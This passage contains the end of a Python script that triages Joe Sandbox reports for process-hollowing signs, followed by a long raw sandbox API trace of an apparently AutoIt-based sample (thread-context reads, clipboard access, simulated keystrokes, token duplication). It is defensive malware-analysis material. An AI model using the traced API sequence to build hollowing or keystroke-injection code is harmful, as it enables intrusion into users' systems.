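    if not record.based_on_pe:
        findings.append("code at %s runs from memory not backed by a PE image" % record.offset)
    direct = {c.name for c in record.apis if not c.in_subcall}  # ignore CRT subcalls
    stages = [s for s, names in HOLLOW_STAGES.items() if direct & names]
    if "create" in stages and len(stages) >= 2:
        findings.append("process hollowing stages: " + ",".join(stages))
    for call in record.apis:
        if call.name.endswith("GetThreadContext") and len(call.args) >= 2:
            try:
                flags = int(call.args[1], 16)   # second argument is ContextFlags
            except ValueError:
                continue
            desc = " ".join(decode_bits(flags, CONTEXT_BITS))
            if flags == CONTEXT_FULL:
                desc += " (CONTEXT_FULL)"
            findings.append("ContextFlags 0x%X -> %s" % (flags, desc))
    return findings

# Sample input: first record copied from the report above, second constructed
# from the report's CreateFileW and RtlFreeHeap lines as a benign control.
SAMPLE = """\
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 00D41A5B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D41AF1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D41B13
Memory Dump Source
• Source File: 00000004.00000002.1302068415.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
APIs
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00E15981,?,?,?,?), ref: 00E15E27
  • Part of subcall function 00E32F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00E39C64), ref: 00E32FA9
Memory Dump Source
• Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.offset, triage(rec) or ["nothing notable"])
```

Subcall entries are deliberately excluded from the stage match: the CRT helpers under "Part of subcall function" (RtlFreeHeap, RtlAllocateHeap and the like) appear under almost every record and would otherwise drown the signal. The ReadProcessMemory size of 4 is left as an observation rather than a rule, since a 4-byte read is only suggestive on its own.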
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 802769ecda857d24d9b0af878398e31e2db415f7170a58d58bbe3d1e6e19ae2b
                                            • Instruction ID: 8b476127a643785eae4ea7dc8ff067a7f1101d870c7d0578f62ca9485851326f
                                            • Opcode Fuzzy Hash: 802769ecda857d24d9b0af878398e31e2db415f7170a58d58bbe3d1e6e19ae2b
                                            • Instruction Fuzzy Hash: 1151AC31700214EFCF14EB68D991EAE77E6AF84314F14A4A8F956BB392CA30ED44CB41
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove
                                            • String ID:
                                            • API String ID: 4104443479-0
                                            • Opcode ID: 2548961d131164ccd24838d8a9b11557f428afeebf0c8d981de7b88311caff12
                                            • Instruction ID: dead1eeac5a7ead3e02e14b0406759a72669f992264fcf4355f5a1f1b4d3e580
                                            • Opcode Fuzzy Hash: 2548961d131164ccd24838d8a9b11557f428afeebf0c8d981de7b88311caff12
                                            • Instruction Fuzzy Hash: 9531A379208A02DFD7249F18C0909A5F7F0FF09B10B54D56AE9DA9B7A5E730D8C1CB84
                                            APIs
                                            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00E15CF6
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: 455251f744fcb4dacda7772898cb6cad7d8d08a785a7d0f28330e291c66df059
                                            • Instruction ID: 9d8942a9ac45d648d61c7b9c165e684093aa41da2bc01ef9ae1ffec275ee74b6
                                            • Opcode Fuzzy Hash: 455251f744fcb4dacda7772898cb6cad7d8d08a785a7d0f28330e291c66df059
                                            • Instruction Fuzzy Hash: C6313C72A00B09EFCB18DF29D48469DF7B5FF88314F149629D819A3710D771A9A0DBD0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ClearVariant
                                            • String ID:
                                            • API String ID: 1473721057-0
                                            • Opcode ID: 1a3bb094cb63ae679615089ac414e7c46c54b0665adaa92af685e88f39386ec4
                                            • Instruction ID: fe7b1283822a9872e4593607aea3a49b842ebd97b414ebab919083aa23426ea3
                                            • Opcode Fuzzy Hash: 1a3bb094cb63ae679615089ac414e7c46c54b0665adaa92af685e88f39386ec4
                                            • Instruction Fuzzy Hash: C6410674509351CFDB24DF14C484B5ABBE0BF45318F1998ACE899AB362C332E889CB52
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove
                                            • String ID:
                                            • API String ID: 4104443479-0
                                            • Opcode ID: 67f77c0f1113e19b13200b09ed2300e907a1473a27ef487db93cdd1597ace486
                                            • Instruction ID: edc6b668ea6272eac8c3763f44231b07c7e15ec63a598c393f1ef8b8543e6a1d
                                            • Opcode Fuzzy Hash: 67f77c0f1113e19b13200b09ed2300e907a1473a27ef487db93cdd1597ace486
                                            • Instruction Fuzzy Hash: 9321D231A04A08EBDB185F52F885ABA7FF8FF50340F21946EE495F5610EB7294E0DB45
                                            APIs
                                              • Part of subcall function 00E14D13: FreeLibrary.KERNEL32(00000000,?), ref: 00E14D4D
                                              • Part of subcall function 00E3548B: __wfsopen.LIBCMT ref: 00E35496
                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00ED62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E14F6F
                                              • Part of subcall function 00E14CC8: FreeLibrary.KERNEL32(00000000), ref: 00E14D02
                                              • Part of subcall function 00E14DD0: _memmove.LIBCMT ref: 00E14E1A
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Library$Free$Load__wfsopen_memmove
                                            • String ID:
                                            • API String ID: 1396898556-0
                                            • Opcode ID: 0030ece74b6fb73ff4c7d91db2196bad8fd1b0b15119c4879c3e5b154466ca59
                                            • Instruction ID: e60fa18a13e4824fb08142924d374bfb419707379f6de4b977773bf9ab55a243
                                            • Opcode Fuzzy Hash: 0030ece74b6fb73ff4c7d91db2196bad8fd1b0b15119c4879c3e5b154466ca59
                                            • Instruction Fuzzy Hash: DC11E372B00709AACF14BF70DC02FEE77E89F44710F24A82AF541B63C1DA719A459BA0
                                            APIs
                                            Similarity
                                            • API ID: ClearVariant
                                            • String ID:
                                            • API String ID: 1473721057-0
                                            APIs
                                            • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00E15807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00E15D76
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            APIs
                                            Similarity
                                            • API ID: _memmove
                                            • String ID:
                                            • API String ID: 4104443479-0
                                            APIs
                                            Similarity
                                            • API ID: _memmove
                                            • String ID:
                                            • API String ID: 4104443479-0
                                            APIs
                                            • __lock_file.LIBCMT ref: 00E34AD6
                                              • Part of subcall function 00E38D68: __getptd_noexit.LIBCMT ref: 00E38D68
                                            Similarity
                                            • API ID: __getptd_noexit__lock_file
                                            • String ID:
                                            • API String ID: 2597487223-0
                                            APIs
                                            • FreeLibrary.KERNEL32(?,?,00ED62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E14FDE
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            APIs
                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E309F4
                                              • Part of subcall function 00E17D2C: _memmove.LIBCMT ref: 00E17D66
                                            Similarity
                                            • API ID: LongNamePath_memmove
                                            • String ID:
                                            • API String ID: 2514874351-0
                                            APIs
                                            Similarity
                                            • API ID: __fread_nolock
                                            • String ID:
                                            • API String ID: 2638373210-0
                                            APIs
                                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00E4E16B,?,?,00000000), ref: 00E15DBF
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            APIs
                                            Similarity
                                            • API ID: __wfsopen
                                            • String ID:
                                            • API String ID: 197181222-0
                                            APIs
                                            • GetLastError.KERNEL32(00000002,00000000), ref: 00E7D46A
                                            Similarity
                                            • API ID: ErrorLast
                                            • String ID:
                                            • API String ID: 1452528299-0
                                            APIs
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            APIs
                                            • Sleep.KERNELBASE(000001F4), ref: 00D422B1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302068415.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d40000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            APIs
                                              • Part of subcall function 00E12612: GetWindowLongW.USER32(?,000000EB), ref: 00E12623
                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00E9CE50
                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E9CE91
                                            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00E9CED6
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E9CF00
                                            • SendMessageW.USER32 ref: 00E9CF29
                                            • _wcsncpy.LIBCMT ref: 00E9CFA1
                                            • GetKeyState.USER32(00000011), ref: 00E9CFC2
                                            • GetKeyState.USER32(00000009), ref: 00E9CFCF
                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E9CFE5
                                            • GetKeyState.USER32(00000010), ref: 00E9CFEF
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E9D018
                                            • SendMessageW.USER32 ref: 00E9D03F
                                            • SendMessageW.USER32(?,00001030,?,00E9B602), ref: 00E9D145
                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00E9D15B
                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00E9D16E
                                            • SetCapture.USER32(?), ref: 00E9D177
                                            • ClientToScreen.USER32(?,?), ref: 00E9D1DC
                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00E9D1E9
                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E9D203
                                            • ReleaseCapture.USER32 ref: 00E9D20E
                                            • GetCursorPos.USER32(?), ref: 00E9D248
                                            • ScreenToClient.USER32(?,?), ref: 00E9D255
                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E9D2B1
                                            • SendMessageW.USER32 ref: 00E9D2DF
                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E9D31C
                                            • SendMessageW.USER32 ref: 00E9D34B
                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E9D36C
                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E9D37B
                                            • GetCursorPos.USER32(?), ref: 00E9D39B
                                            • ScreenToClient.USER32(?,?), ref: 00E9D3A8
                                            • GetParent.USER32(?), ref: 00E9D3C8
                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E9D431
                                            • SendMessageW.USER32 ref: 00E9D462
                                            • ClientToScreen.USER32(?,?), ref: 00E9D4C0
                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E9D4F0
                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E9D51A
                                            • SendMessageW.USER32 ref: 00E9D53D
                                            • ClientToScreen.USER32(?,?), ref: 00E9D58F
                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E9D5C3
                                              • Part of subcall function 00E125DB: GetWindowLongW.USER32(?,000000EB), ref: 00E125EC
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00E9D65F
                                            Strings
                                            Similarity
                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                            • String ID: @GUI_DRAGID$F$pr
                                            • API String ID: 3977979337-1436871235
                                            • Opcode ID: 5e68642eb2c4ed57a642ff4f0418b0d35dd94e8756d853a94654dcd228be277b
                                            • Instruction ID: bc97b0b7a8bb70b0df6f968f7f0909ce65cd261c133b8f035293091816c63088
                                            • Opcode Fuzzy Hash: 5e68642eb2c4ed57a642ff4f0418b0d35dd94e8756d853a94654dcd228be277b
                                            • Instruction Fuzzy Hash: B142B074204341AFCB25DF28CC54FAABBE6FF49318F24151EF696A72A1C7319854CB92
                                            APIs
                                            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00E9873F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: %d/%02d/%02d
                                            • API String ID: 3850602802-328681919
                                            • Opcode ID: f57b258cfa060b86b9ec3979fcf9c8f456aa87b3d40c9acc92947b2f9bacee01
                                            • Instruction ID: b6080e2797e2e92047c5eec9dba29e030fe6945dd452c364c4d2ace17af22f22
                                            • Opcode Fuzzy Hash: f57b258cfa060b86b9ec3979fcf9c8f456aa87b3d40c9acc92947b2f9bacee01
                                            • Instruction Fuzzy Hash: 7112DE71600204AFEF248F65CD49FAA7BF9EF46714F20612AF916FA2B1DB708945CB50
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove$_memset
                                            • String ID: 0w$DEFINE$Oa$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                            • API String ID: 1357608183-332139107
                                            • Opcode ID: 55a5989e56146b2dee25be34153e882cf8aac2d2575fc8a9ce44c2f3c64508cc
                                            • Instruction ID: 0a829d71edea4cdb7af4efce889169dd7eb4ff0df22495d7eaf488db0a1a1be5
                                            • Opcode Fuzzy Hash: 55a5989e56146b2dee25be34153e882cf8aac2d2575fc8a9ce44c2f3c64508cc
                                            • Instruction Fuzzy Hash: E993A171A40219DFDB24CF68E881BEDB7B1FF48354F24916AE955BB290E7709E81CB40
                                            APIs
                                            • GetForegroundWindow.USER32(00000000,?), ref: 00E14A3D
                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E4DA8E
                                            • IsIconic.USER32(?), ref: 00E4DA97
                                            • ShowWindow.USER32(?,00000009), ref: 00E4DAA4
                                            • SetForegroundWindow.USER32(?), ref: 00E4DAAE
                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E4DAC4
                                            • GetCurrentThreadId.KERNEL32 ref: 00E4DACB
                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E4DAD7
                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E4DAE8
                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E4DAF0
                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 00E4DAF8
                                            • SetForegroundWindow.USER32(?), ref: 00E4DAFB
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E4DB10
                                            • keybd_event.USER32(00000012,00000000), ref: 00E4DB1B
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E4DB25
                                            • keybd_event.USER32(00000012,00000000), ref: 00E4DB2A
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E4DB33
                                            • keybd_event.USER32(00000012,00000000), ref: 00E4DB38
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E4DB42
                                            • keybd_event.USER32(00000012,00000000), ref: 00E4DB47
                                            • SetForegroundWindow.USER32(?), ref: 00E4DB4A
                                            • AttachThreadInput.USER32(?,?,00000000), ref: 00E4DB71
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                            • String ID: Shell_TrayWnd
                                            • API String ID: 4125248594-2988720461
                                            • Opcode ID: 82b6d22fb92af13d25cf55eea054f93074c84c0ae0b336ec4d8d1e083d80da70
                                            • Instruction ID: b2cefe4f09b8ccad3ed08c5dc7233a73cc3322c0e9c8b80e639c5ccff2c6a18c
                                            • Opcode Fuzzy Hash: 82b6d22fb92af13d25cf55eea054f93074c84c0ae0b336ec4d8d1e083d80da70
                                            • Instruction Fuzzy Hash: B1316571A44318BFEB216FA29C49FBF3E6CEB44B50F114027FA04FA1D1D6B05D11AAA1
                                            APIs
                                              • Part of subcall function 00E68CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E68D0D
                                              • Part of subcall function 00E68CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E68D3A
                                              • Part of subcall function 00E68CC3: GetLastError.KERNEL32 ref: 00E68D47
                                            • _memset.LIBCMT ref: 00E6889B
                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E688ED
                                            • CloseHandle.KERNEL32(?), ref: 00E688FE
                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E68915
                                            • GetProcessWindowStation.USER32 ref: 00E6892E
                                            • SetProcessWindowStation.USER32(00000000), ref: 00E68938
                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E68952
                                              • Part of subcall function 00E68713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E68851), ref: 00E68728
                                              • Part of subcall function 00E68713: CloseHandle.KERNEL32(?,?,00E68851), ref: 00E6873A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                            • String ID: $default$winsta0
                                            • API String ID: 2063423040-1027155976
                                            • Opcode ID: 72fab37e4e2403c9cb730a8e94fc179ace7c045559e36218095a1f30f330a94a
                                            • Instruction ID: 8b2cc32e8bea41967ee31d13d042690fd5554a6dac7a7e36e253ee6c282bd2e3
                                            • Opcode Fuzzy Hash: 72fab37e4e2403c9cb730a8e94fc179ace7c045559e36218095a1f30f330a94a
                                            • Instruction Fuzzy Hash: AE813F71980209AFDF11DFE4EE45AEE7BB8AF04354F18526AFD10B6161DB318D14DB60
                                            APIs
                                            • OpenClipboard.USER32(00E9F910), ref: 00E84284
                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00E84292
                                            • GetClipboardData.USER32(0000000D), ref: 00E8429A
                                            • CloseClipboard.USER32 ref: 00E842A6
                                            • GlobalLock.KERNEL32(00000000), ref: 00E842C2
                                            • CloseClipboard.USER32 ref: 00E842CC
                                            • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00E842E1
                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 00E842EE
                                            • GetClipboardData.USER32(00000001), ref: 00E842F6
                                            • GlobalLock.KERNEL32(00000000), ref: 00E84303
                                            • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00E84337
                                            • CloseClipboard.USER32 ref: 00E84447
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                            • String ID:
                                            • API String ID: 3222323430-0
                                            • Opcode ID: d4086eede193250e93be0b3bbbe91bb48d30cb52d0fd0f8124b92aa8c13d9413
                                            • Instruction ID: db75bf3f6f1f51845fb94744adff32ef73a4a03a66ec97ea8b56f4098724965c
                                            • Opcode Fuzzy Hash: d4086eede193250e93be0b3bbbe91bb48d30cb52d0fd0f8124b92aa8c13d9413
                                            • Instruction Fuzzy Hash: 3D517E71204306AFD311BF61EC95FAE77A8EF84B04F10552AF55AF21E2DB7099488B62
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?), ref: 00E7C9F8
                                            • FindClose.KERNEL32(00000000), ref: 00E7CA4C
                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E7CA71
                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E7CA88
                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E7CAAF
                                            • __swprintf.LIBCMT ref: 00E7CAFB
                                            • __swprintf.LIBCMT ref: 00E7CB3E
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                            • __swprintf.LIBCMT ref: 00E7CB92
                                              • Part of subcall function 00E338D8: __woutput_l.LIBCMT ref: 00E33931
                                            • __swprintf.LIBCMT ref: 00E7CBE0
                                              • Part of subcall function 00E338D8: __flsbuf.LIBCMT ref: 00E33953
                                              • Part of subcall function 00E338D8: __flsbuf.LIBCMT ref: 00E3396B
                                            • __swprintf.LIBCMT ref: 00E7CC2F
                                            • __swprintf.LIBCMT ref: 00E7CC7E
                                            • __swprintf.LIBCMT ref: 00E7CCCD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
